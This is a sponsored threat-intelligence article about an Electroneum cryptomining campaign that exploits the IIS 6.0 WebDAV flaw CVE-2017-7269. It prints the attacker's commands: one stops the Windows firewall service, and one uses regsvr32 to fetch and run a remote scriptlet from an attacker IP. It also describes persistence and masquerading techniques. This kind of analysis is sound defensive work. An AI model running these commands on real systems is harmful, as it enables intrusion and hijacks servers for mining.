Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Partner Perspectives  Connecting marketers to our tech communities.
SPONSORED BY
5/10/2018
09:00 AM
Andrey Shalnev
Andrey Shalnev
Partner Perspectives
50%
50%

Electroneum Cryptomining Targets Microsoft IIS 6.0 Vulnerability

New campaign shows that there are still systems exposed to the year-old CVE-2017-7269 vuln on an operating system that was declared end-of-life three years ago.

F5 researchers recently noticed a new campaign exploiting a year-old vulnerability in Microsoft Internet Information Services (IIS) 6.0 servers  to mine Electroneum cryptocurrency using the same IIS vulnerability (CVE–2017–7269) reported last year by ESET security researchers to have been abused to mine Monero and launch targeted attacks against organizations by the notorious "Lazarus" group. Lazarus group is widely believed to be North Korean government hackers.

This latest campaign shows that there are still systems vulnerable to this year-old vulnerability on an operating system that was declared end-of-life (EoL) three years ago.  More recently, for example,in March 2017, it was publicly disclosed that Microsoft Internet Information Services (IIS) 6.0 is vulnerable to a new buffer overflow vulnerability in its WebDAV functionality. On successful exploitation, it is possible to remotely execute code. Upon release, it was reported that the vulnerability was already being exploited in the wild. Within two days, a Proof-of-Concept (POC) exploit was published.

Shellcode Analysis

The exploit in this campaign is identical to the original Proof-of-Concept (POC) exploit published in March 2017 but it embeds a different shellcode to execute attacker’s commands. The shellcode itself is an ASCII shellcode which contains a Return-Oriented Programming (ROP) chain. ASCII shellcode is machine code that consists entirely of alphanumeric ASCII or unicode characters, which allows an attacker to bypass input restrictions. The ROP exploitation technique composes shellcode from instructions already loaded into memory called "gadgets," instead of writing and executing additional external code into memory. This allows attackers to bypass security mechanisms such as executable space protection and code signing.

The execution of this shellcode results in opening a reverse shell to a malicious remote server. A reverse shell is a type of shell in which the target machine communicates back to attacker’s remote machine and waits for the attacker to send shell commands.

Once the compromised server is connected to the attacker’s remote machine, it will automatically receive and execute two commands.

Image Source: F5
Image Source: F5

First Command

CD /d %WinDir%\Temp\ & Net Stop SharedAccess /Y

This command stops the “Internet Connection Firewall (ICF)” service, which if present, may block outgoing communication from the compromised machine.

Second Command

TaskKill /IM RegSvr32.exe /f & Start RegSvr32.exe /s /n /u /i:http://117.79.132.174/images/test.sct scrobj.dll

Here, the attacker is using a technique named “Squiblydoo” to bypass software whitelisting protection by executing attacker commands with a legitimate Microsoft binary. It allows the attacker to fetch and execute a remote Extensible Markup Language (XML) file that contains "scriptlets" with attacker’s code of choice, using a legitimate and signed “regsvr32” Windows binary. This binary is proxy aware, uses Transport Layer Security (TLS) encryption, and follows redirects.

Executing the Scriptlets

The downloaded XML file named "test.sct" contains VBscript scriptlets that hold attacker’s commands. The Microsoft Visual Basic Scripting (VBScript) still had attacker comments embedded.

Updating the Malware

If the attacker compromised the server previously, the script will stop and replace the old binary file with a new one before execution. The script tries to terminate a process of a specific file named “lsass.eXe” that is located in Windows OS folder under the path of "/System32/Temp."

The name "lsass.eXe" was chosen to mask the malicious file as a legitimate "lsass" process, a critical part of Windows.  To make sure that the process terminates before the script tries to delete the file, the attacker uses the “ping” command to delay script execution. Our assumption is that the attacker chose the “ping” command over the “sleep” command because it is less suspicious. The “sleep” command appears to be commented out.

After performing these commands, the script creates a new file in the same location with the same name using the binary data from the Base64 string and executes it.

Getting Persistence as RPC Service

The script tries to register the execution command as an "RpcRemote" service to launch itself upon every system startup, which will grant persistence on the target. The name "RpcRemote" was chosen to make it look like a legitimate component of the operation system.

Mining Electroneum

By looking at the command line executed by the script, we assume that the executable file is a crypto-currency miner. The clues are to be found in the "-p" and "-u" arguments, "stratum+tcp://" address, as well as the long wallet address starting with the "etn" letters, implying Electroneum (ETN) crypto-coin. The file itself is a 32bit version of a crypto-currency miner called XMRig (2.5.2) that was packed using the "Ultimate Packer for Executables" (UPX) packer.

The execution command instructs the miner to mine the Electroneum crypto-currency using several pools simultaneously to this wallet:

etnjzC1mw32gSBsjuYgwWKH5fZH6ca45MDxi6UwQQ9C8GJErY3rVrqJA8sDtPKMJXsPuv4vdSyDzGVTVqgAh97GT8smQMoUaQn

At the time of writing, the attacker has earned roughly $99 from the campaign across booth pools. This is a very small amount of money earned, given how lucrative most other crypto-mining campaigns are currently, making this campaign appear unsuccessful. One theory is that the attacker will change the wallet address from time to time. Another theory is that there aren’t many IIS 6.0 servers available to exploit left.

But although these attackers haven’t made much money on this campaign yet, we encourage businesses to abandon the use of EOL software in every instance possible. When that's not feasible, we recommend patching any critical vulnerability immediately upon release of the patch. If patching is not possible, there are many compensating controls that can be implemented depending on your security control framework such as blocking attacks with a Web Application Firewall (WAF), or not allowing vulnerable legacy systems to touch the internet.

For more details, click here.

Get the latest application threat intelligence from F5 Labs.

F5 makes apps go-faster, smarter, and safer. With solutions for the cloud and the data center, F5 technology provides unparalleled visibility and control, allowing customers to secure their users, applications, and data. For more information, visit www.f5.com. View Full Bio
Comment  | 
Print  | 
More Insights
Comments
Threaded  |  Newest First  |  Oldest First
Data Leak Week: Billions of Sensitive Files Exposed Online
Kelly Jackson Higgins, Executive Editor at Dark Reading,  12/10/2019
Lessons from the NSA: Know Your Assets
Robert Lemos, Contributing Writer,  12/12/2019
4 Tips to Run Fast in the Face of Digital Transformation
Shane Buckley, President & Chief Operating Officer, Gigamon,  12/9/2019
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
The Year in Security: 2019
This Tech Digest provides a wrap up and overview of the year's top cybersecurity news stories. It was a year of new twists on old threats, with fears of another WannaCry-type worm and of a possible botnet army of Wi-Fi routers. But 2019 also underscored the risk of firmware and trusted security tools harboring dangerous holes that cybercriminals and nation-state hackers could readily abuse. Read more.
Flash Poll
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2019-5252
PUBLISHED: 2019-12-14
There is an improper authentication vulnerability in Huawei smartphones (Y9, Honor 8X, Honor 9 Lite, Honor 9i, Y6 Pro). The applock does not perform a sufficient authentication in a rare condition. Successful exploit could allow the attacker to use the application locked by applock in an instant.
CVE-2019-5235
PUBLISHED: 2019-12-14
Some Huawei smart phones have a null pointer dereference vulnerability. An attacker crafts specific packets and sends to the affected product to exploit this vulnerability. Successful exploitation may cause the affected phone to be abnormal.
CVE-2019-5264
PUBLISHED: 2019-12-13
There is an information disclosure vulnerability in certain Huawei smartphones (Mate 10;Mate 10 Pro;Honor V10;Changxiang 7S;P-smart;Changxiang 8 Plus;Y9 2018;Honor 9 Lite;Honor 9i;Mate 9). The software does not properly handle certain information of applications locked by applock in a rare condition...
CVE-2019-5277
PUBLISHED: 2019-12-13
Huawei CloudUSM-EUA V600R006C10;V600R019C00 have an information leak vulnerability. Due to improper configuration, the attacker may cause information leak by successful exploitation.
CVE-2019-5254
PUBLISHED: 2019-12-13
Certain Huawei products (AP2000;IPS Module;NGFW Module;NIP6300;NIP6600;NIP6800;S5700;SVN5600;SVN5800;SVN5800-C;SeMG9811;Secospace AntiDDoS8000;Secospace USG6300;Secospace USG6500;Secospace USG6600;USG6000V;eSpace U1981) have an out-of-bounds read vulnerability. An attacker who logs in to the board m...